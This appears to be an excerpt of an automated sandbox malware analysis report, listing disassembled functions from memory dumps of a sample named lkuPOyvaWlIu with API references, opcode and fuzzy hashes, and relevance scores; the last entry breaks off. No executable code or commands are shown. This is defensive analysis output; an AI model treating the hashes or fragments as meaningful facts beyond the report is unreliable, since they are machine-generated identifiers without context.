Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 3d84539d311c40b4647ec0decd584dde2b44eb0903534ea0ca8f5af7817e6b7c
Instruction ID: d996645649e25594ac63d26ddb72d6350aa1468d768783922b8af19af3cdc5db
Opcode Fuzzy Hash: 3d84539d311c40b4647ec0decd584dde2b44eb0903534ea0ca8f5af7817e6b7c
Instruction Fuzzy Hash: 2B52C974A00219CFCB54DF68E998A9DBBF2FB48301F1082A6D509A7365DB346E85CF91

Function 016E51B0 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3f00a7d79eab039142d3ac9810d1013edf5c325d6b4d03289bf26a1835f64162
Instruction ID: a9c1e56b9d0e60d13c0957a4993fb1be341a4f5599a54a41653ffe6ceb873e73
Opcode Fuzzy Hash: 3f00a7d79eab039142d3ac9810d1013edf5c325d6b4d03289bf26a1835f64162
Instruction Fuzzy Hash: 4C713270A01B058FDB24DF69D95875ABBF1BF88304F008A2AE48AD7B50DB74E945CB91

Function 016E7384 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E74A2

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8bb2b31c59d0e7cd22350f3b7efbb1b67ca479b13230ed6557c228d88d7e88be
Instruction ID: 22e607214708b9bf432f62ba53a4753f98314ffc4ae22e8a6ec9fcb9288628f3
Opcode Fuzzy Hash: 8bb2b31c59d0e7cd22350f3b7efbb1b67ca479b13230ed6557c228d88d7e88be
Instruction Fuzzy Hash: BE51D0B1D01349DFDB14CFA9D884ADEBFB5BF48310F24822AE819AB210D771A841CF91

Function 016E482C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E74A2

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9bc3f7c32f7580caeb97011a50eaef3f7aa589f204bca2a50e65d3a60e1ab4d0
Instruction ID: 3ad779a97a31929291b55c49f89398456bc3b097012dd26dffc2882d5431324c
Opcode Fuzzy Hash: 9bc3f7c32f7580caeb97011a50eaef3f7aa589f204bca2a50e65d3a60e1ab4d0
Instruction Fuzzy Hash: 9251BFB1D01309DFDB14CFAAD984ADEBFB5BF48310F24822AE819AB210D7749845CF91

Function 016E497C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 016E9B91

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 27f0926014c9c8389ac195160a796640e24b4e05cf3e50357629ad7faf18f618
Instruction ID: 55fad7d2125a7f8027ff39eeed8d26c5ead804e5cfdd4e79b688e3835c2e537d
Opcode Fuzzy Hash: 27f0926014c9c8389ac195160a796640e24b4e05cf3e50357629ad7faf18f618
Instruction Fuzzy Hash: D841F8B49002499FCB14CF99C888AABBBF5FF89318F15C559E519AB321D774A841CFA0

Function 06F2992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06F29A6E

Memory Dump Source

Source File: 0000000F.00000002.4139419804.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f20000_lkuPOyvaWlIu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c67c0f9b6eb2fdb468f7ebb5ee60f3eedde7b45e54e86a9cebc562d190a02fc
Instruction ID: 91ceebe061afe4c3893be91086aabc025138cd6d89e31ffdc760c432792ea43c
Opcode Fuzzy Hash: 2c67c0f9b6eb2fdb468f7ebb5ee60f3eedde7b45e54e86a9cebc562d190a02fc
Instruction Fuzzy Hash: B6117C75E0121A9FDB44CFEAD884AADBBB5FF88314F148169E804E7245DBB0A941CF50

Function 016E4674 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016E51CC), ref: 016E5406

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 383f9d846a4d79976b6f6aac7f7803c46a0eaaee8f75703fe08b99be6f866974
Instruction ID: 0baf02cd2efde2324169f7a11f4317baee592b18de6e981341283594e4145f4e
Opcode Fuzzy Hash: 383f9d846a4d79976b6f6aac7f7803c46a0eaaee8f75703fe08b99be6f866974
Instruction Fuzzy Hash: C21120B5D01348CFCB10CF9AC848A9EFBF4EB88314F10812AD919A7200D375A545CFA5

Function 016EB180 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 016EC06D

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 718372f663456713155913087613e61748d7d0f4c442e5a4abca0e20a238df18
Instruction ID: 7ac58b285e9380cae07e4fd889b032aeae4739b6aa19e1bc1f2bfc8158912f00
Opcode Fuzzy Hash: 718372f663456713155913087613e61748d7d0f4c442e5a4abca0e20a238df18
Instruction Fuzzy Hash: E31103B19007488FCB20DF9AD548B9EBFF4EB48324F108559D519A7310C375A944CFA5

Function 016EC010 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 016EC06D

Memory Dump Source

Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 16e48a194c7aa5486574981da1da5ef2b4bee55ef09d62a4267e5047e1b00395
Instruction ID: 2ec45e96b0ff6f87e8d3695b5af53580bd57fa29757418c827d2d82b1585df2e
Opcode Fuzzy Hash: 16e48a194c7aa5486574981da1da5ef2b4bee55ef09d62a4267e5047e1b00395
Instruction Fuzzy Hash: 981103B58007488FDB20DFAAD549BDEFFF4EB48320F10855AD519A7610C375A984CFA5

Function 056EAEF0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

(o^q, xrefs: 056EB079

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 5dd9ad82489dbeef4b9336f9388a5cf5fa3fad6dad8b0344b713983fd6678efc
Instruction ID: ac090d5000c74e3273f56bdc011f71343a3372820d6ce40ede5e96a967b099c5
Opcode Fuzzy Hash: 5dd9ad82489dbeef4b9336f9388a5cf5fa3fad6dad8b0344b713983fd6678efc
Instruction Fuzzy Hash: D1618175B012059FCB05DF68C898AAEBBB6FF88750B148569E916D73A0DF31ED01CB90

Function 056E6FC8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

(o^q, xrefs: 056E753D

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 6b5c9077b1fd358cae275b62887127c4224784f50f5854e08cc9a5d92f561cee
Instruction ID: 871d331c490321f11f3c72dba912b9eef4ffddc5beb97af59077ec5735470663
Opcode Fuzzy Hash: 6b5c9077b1fd358cae275b62887127c4224784f50f5854e08cc9a5d92f561cee
Instruction Fuzzy Hash: 3841BE70606289DFCB16CF68C844B6EBBF6FB44300F04846AE8158B752DB75DD45CBA1

Function 056EE007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f358b5c6d4eb3775e7bed40e18972bba829aee1868639b562e38f50a9d93419d
Instruction ID: 7684188dac3623113cb73b93cc82c2672e0234d01945fb4f2c689e3da00b5eb3
Opcode Fuzzy Hash: f358b5c6d4eb3775e7bed40e18972bba829aee1868639b562e38f50a9d93419d
Instruction Fuzzy Hash: D11295780312528FA7512F34A6AE53EBF69FB4F363705EC52F95A806559F300488EF22

Function 056EE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdf920734fef55147e6aa27e625fc6ef681461f7634c51d8966b4ca04cf3d43
Instruction ID: 430eb5d910391e299ffc4d5517fd7625623eaa23954e57101323588a4b5f01a3
Opcode Fuzzy Hash: ecdf920734fef55147e6aa27e625fc6ef681461f7634c51d8966b4ca04cf3d43
Instruction Fuzzy Hash: 751283781312528FA7502F24A6AE53EBF69FB4F363705FC52F95A806559F300588EF22

Function 056E8490 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97a7064ad680aa04168cdcd7e06b1baab41b8ecc7743431059c06bc63f1f3d6
Instruction ID: afba59dfdec9d9078b62a9744367adb7ad7af2164dbaddeebac5a298831fbee8
Opcode Fuzzy Hash: a97a7064ad680aa04168cdcd7e06b1baab41b8ecc7743431059c06bc63f1f3d6
Instruction Fuzzy Hash: 51423174A00218CFEB549BA8C890B9EBB77FF94340F1081A9C50A6B3A5DF355E85EF51

Function 056E8481 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d503e08d5735a1d050649bcf8e6342504c3c59bdcaa8e2d0199272c317730062
Instruction ID: c9dbeee84af19e2ff70c853b1c4b17a37e9776d4b5111979649c80d2c133d38d
Opcode Fuzzy Hash: d503e08d5735a1d050649bcf8e6342504c3c59bdcaa8e2d0199272c317730062
Instruction Fuzzy Hash: 13423174A00219CFEB549BA8C890B9EBB77FF94340F1081A9C50A6B3A4DF355E85EF51

Function 056E9A10 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ba84cf0dfebb42ce7eeea020f29be79f0dc11dd228435cbd6a474f7382165f
Instruction ID: 38f58d3f8f5e2e4d812f1e7aaf6aa2538b24fcddd71e38ccd2acb2452f74727d
Opcode Fuzzy Hash: 38ba84cf0dfebb42ce7eeea020f29be79f0dc11dd228435cbd6a474f7382165f
Instruction Fuzzy Hash: 59917931A076059FC711CF6CC8849AABBB6FF85364B14C6A6D828D7751DB31F911CBA0

Function 056E80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7ca26caca6e2175454c2dcc325ce5f1245dad65883f33b7e0ce4098b20257d
Instruction ID: d14961dc27a7acff6b3ab538f059cca3d7c939a717a30b25ef0343d61ba5631d
Opcode Fuzzy Hash: 0e7ca26caca6e2175454c2dcc325ce5f1245dad65883f33b7e0ce4098b20257d
Instruction Fuzzy Hash: F4715E347066058FCB25DF68C894AAE7BE6BF89205F1540A9E806DB7B1DB70DC41CB91

Function 056EF739 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376cd2a380efa45c046edfdcc0294f3d90cf90342f5c03289480d3647ef44212
Instruction ID: 8facaf6dd982cd4fd8b46e4f631b55b3e4060bef1c664486935468d14f887608
Opcode Fuzzy Hash: 376cd2a380efa45c046edfdcc0294f3d90cf90342f5c03289480d3647ef44212
Instruction Fuzzy Hash: C7610434E01219DFDB14DFA5D988AADBBB2FF88304F208529E809BB394DB355946CF41

Function 056ED548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489da0fa78524e3c5abe44494f957ff137ed147405055736afb61aa8442ad873
Instruction ID: 7ff43f730a57f0f7cfe87188a6467705c7603dac14a1c44c3b71d0476e301bbb
Opcode Fuzzy Hash: 489da0fa78524e3c5abe44494f957ff137ed147405055736afb61aa8442ad873
Instruction Fuzzy Hash: 6E519474E01218DFDB58DFA9D58499DBBF2FF89300F208169E819AB365DB30A905CF50

Function 056E41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc934d33fa7187710caf97a3cf7a9ce8669c8a56421875813eefac169548f45b
Instruction ID: ffeca9bf0944fe289651936145a076a614fe1bbab7fe2a01b1add33a759bfe61
Opcode Fuzzy Hash: dc934d33fa7187710caf97a3cf7a9ce8669c8a56421875813eefac169548f45b
Instruction Fuzzy Hash: 2651A874E01208CFCB08DFA9D59499DBBF2FF89304B209069E815AB365DB35AD42CF50

Function 056EA303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58e4019cea5c91c34a038fa6672a21b8498b4f84fd2a340ffab59efa75b916e
Instruction ID: 1f62e19f2324e7387fd87f5205cd9ee03975713466c31db89f25c9b629124de0
Opcode Fuzzy Hash: f58e4019cea5c91c34a038fa6672a21b8498b4f84fd2a340ffab59efa75b916e
Instruction Fuzzy Hash: F9417D31A06259DFCF11CFE8C848AAEBBB2BF89310F048556E919AB791D734ED14CB50

Function 056E5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da6b821156d1bcdb871d9af25d316feb1698f5e6e149383e90353bdc73722f
Instruction ID: 6137c46b6ab12fc9b9661c73189f5165838b5eae184d323bea2ddf34bf776fd6
Opcode Fuzzy Hash: 08da6b821156d1bcdb871d9af25d316feb1698f5e6e149383e90353bdc73722f
Instruction Fuzzy Hash: 4A315C352062199FCF019F68D884ABE3FA2FB68344F008425F91A8B354CB35CE61EF91

Function 056E8370 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e9fd2e59483ac69f9bc182474b4f94aaa7f9541b2a94c4b1f1a562d858d15d
Instruction ID: ecb0c4e684248423df6b8a26dc5409b2a71d2d6f5a015bcfc279fbf4f30dcd19
Opcode Fuzzy Hash: b4e9fd2e59483ac69f9bc182474b4f94aaa7f9541b2a94c4b1f1a562d858d15d
Instruction Fuzzy Hash: CD210731307215CBCB155B798854A3E3A97FFC5748708827AD906CBBA5EE26CC43E782

Function 056E2790 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440938579789c58b077e3467b629c6e491ad00c998a45897d0531a46aeba386e
Instruction ID: f8b94cc2bf3199e15bec9e3df445551362c0ea47677592d70215a60c177a0039
Opcode Fuzzy Hash: 440938579789c58b077e3467b629c6e491ad00c998a45897d0531a46aeba386e
Instruction Fuzzy Hash: CE315C74D4A2098FCB45DFA8E4546EEBFFAFB4A300F10416AD805A7265EB304A55CBA1

Function 056E8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89703dfed06fd5b0f549dec40ab83c5aa42736d0cdfdc761b756534e04731f30
Instruction ID: e80300188a17f2b599a7819226aabd53ff35b10dde250e23293399748ff0be08
Opcode Fuzzy Hash: 89703dfed06fd5b0f549dec40ab83c5aa42736d0cdfdc761b756534e04731f30
Instruction Fuzzy Hash: 0C21CF313072118BDB159A69C454A3E669BFFC4748F148239E906CBB98EE76CC43E782

Function 056E62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb433108e5e5367f1808465365dadc537f489d075a5a7b3f7c65068abb47ac00
Instruction ID: 643ce0dcd2c77932139ffdbea84a0562d1daa97c6f970611cdea6f5fb3867640
Opcode Fuzzy Hash: eb433108e5e5367f1808465365dadc537f489d075a5a7b3f7c65068abb47ac00
Instruction Fuzzy Hash: B821D4357065218FC7158A29E49893EBBA2FFE9751704856AE80BCB794CF31DC02CB91

Function 056E28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97bd525bb06d78df71324d1625bb031171431a4fd1113f214934b3cd11a910b1
Instruction ID: 06cdd1c958561a7b7023c414b4e605582de9bb2771891d99a687a245738c1220
Opcode Fuzzy Hash: 97bd525bb06d78df71324d1625bb031171431a4fd1113f214934b3cd11a910b1
Instruction Fuzzy Hash: 8521A175A011059FCB14DF34D4509AE37AAFB9D664B50C059D84A9B380DA34EE43CBE2

Function 0185D468 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4121852365.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_185d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab2d2f3a225e740a3ddd3805f0a1d87ce1eeeb2a239724f85d0dbb8eaa631b9
Instruction ID: 6064dd230a2cb160a9d1ca355e224477aea144e456fcfe1340f4a7f667743215
Opcode Fuzzy Hash: 4ab2d2f3a225e740a3ddd3805f0a1d87ce1eeeb2a239724f85d0dbb8eaa631b9
Instruction Fuzzy Hash: 3B216772100204DFDB01DF98D9C0B26BF65FB98318F20C26DEC098B256C33AD546C7A2

Function 0186D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4121937421.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_186d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89334a578214a072629de77bc33d4e6fba7488dfb98d3eb5746bc5de4a2ffd9a
Instruction ID: 755c16f534712a4b96d9730d086899394af3ce836259f682012c8ba649fd53c8
Opcode Fuzzy Hash: 89334a578214a072629de77bc33d4e6fba7488dfb98d3eb5746bc5de4a2ffd9a
Instruction Fuzzy Hash: 3F213771604204DFCB11DF58C9C4B26BB69FB84318F20C66DE9898F352C77AD446CA62

Function 056EF747 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fac0ba9353500846232ce7eaeeacfdfb54e2f8f1631405d55ca3fdcf2f29cc3
Instruction ID: abffb4e4d9a5c3e6f61e41da5ea7f612345386a7e53b6a874fb2970e76b1dd28
Opcode Fuzzy Hash: 7fac0ba9353500846232ce7eaeeacfdfb54e2f8f1631405d55ca3fdcf2f29cc3
Instruction Fuzzy Hash: 58210E70D02219DBDB04CFA5D4487EDBBB2BF49304F50842AE859BB284EB744A4ACB51

Function 056E5649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d00342c37aa09a05a1483416a53f0787a861fb87716aac81b3d86b161a4c2d
Instruction ID: 68d587a1ee7c9c59a20684ec12fbe1f3f005e18afcf05e2a1b3b246346b7e600
Opcode Fuzzy Hash: 07d00342c37aa09a05a1483416a53f0787a861fb87716aac81b3d86b161a4c2d
Instruction Fuzzy Hash: 3921FF357062098FCB019F28D488A6E3FA2FB65304F008465F80A8B755CB34CEA1DBA1

Function 056E9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c837f1f7d5f60ba1c9a71dbf8169e4784730ca38120de05052a5d0f879216cb
Instruction ID: b17b0c05271f1a0e932621a0e4ca00edf00083df1bd1855bc57f7af3f335b365
Opcode Fuzzy Hash: 4c837f1f7d5f60ba1c9a71dbf8169e4784730ca38120de05052a5d0f879216cb
Instruction Fuzzy Hash: 50216834E022489FCB15CFA5E594AEEBFB6EF49305F248069E411E63A1DB34D981DF20

Function 056EF658 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f388866eede28447a2fcac82c9b23fb110b068a79a54f8dd5181f9f1df7b43
Instruction ID: f9b690fd7fe1c1fdcb1f394ea153cc32e70f78773992895d214b4bc23a37f808
Opcode Fuzzy Hash: d7f388866eede28447a2fcac82c9b23fb110b068a79a54f8dd5181f9f1df7b43
Instruction Fuzzy Hash: C2217F70A012099FCB45DFBDE98468DBFF1FF45300F1095A9D4549B36AEB345A85CB81

Function 056E6739 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec60cd300d6124aeb82d0b752f9fc5817e51d2a18a389200a4c7f23a60766142
Instruction ID: 1f67c783af54fd5eee7793c4738d95339fc152b1ddaa0b7a381eb848c58d8f60
Opcode Fuzzy Hash: ec60cd300d6124aeb82d0b752f9fc5817e51d2a18a389200a4c7f23a60766142
Instruction Fuzzy Hash: 0801453470B2000FCBA4AB3CF51C46D7B96FB9124072044B9D506CBBA6EE64CC8AC360

Function 056E6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd4c9f8fb9fe3b5bc249b8ee1f55d6fad274a39040d9f19c16bf84c23ad0474
Instruction ID: 88ce9861f43eaa3cd828960daafe6aef12d68f47ed053376df34e97f0e4e40d1
Opcode Fuzzy Hash: dcd4c9f8fb9fe3b5bc249b8ee1f55d6fad274a39040d9f19c16bf84c23ad0474
Instruction Fuzzy Hash: EC11A1353066119FCB159A2AE49893EBBA6FFD97913094479E90BCB750CF31DC02CB90

Function 056E27F0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3866a4ac3ee0e1cd4adc56212a5639bc8be6c7df437d6961401a0c736c46347c
Instruction ID: 2698ac814e94841b9e1b9fc4c1033791b5458200ce69d5581538259a06c7c70c
